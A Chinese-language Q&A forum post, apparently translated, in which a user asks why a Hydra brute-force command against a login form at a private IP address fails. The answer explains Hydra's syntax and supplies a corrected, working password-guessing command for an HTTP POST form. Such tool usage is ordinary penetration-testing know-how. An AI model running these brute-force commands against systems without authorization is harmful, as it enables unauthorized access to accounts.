Hydra 暴力破解错误

Hydra 暴力破解错误
hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!

我不确定为什么会出现错误,因为有字符串^PASS^。应用程序上没有用户名。

登录表单的完整 URL 是:http://192.168.0.24:1234/

有人可以帮忙吗?

答案1

关于您的问题:

  1. 当使用 hydra 时,不需要将其放在http://要攻击的主机前面。
  2. 要指定端口,请使用-s标志。
  3. 您需要指定-l标志,否则会出现错误。
  4. 在 POST 请求中,您必须指定将接收 POST 请求的文件(例如 index.php、password.php、validate.php 等)
  5. 最后,但并非最不重要的一点是,您必须指定成功案例或失败案例。

尝试以下命令,这是我根据提供的信息能做的最好的事情:

hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt

我自己尝试过并且它没有产生任何错误。

祝你好运!

相关内容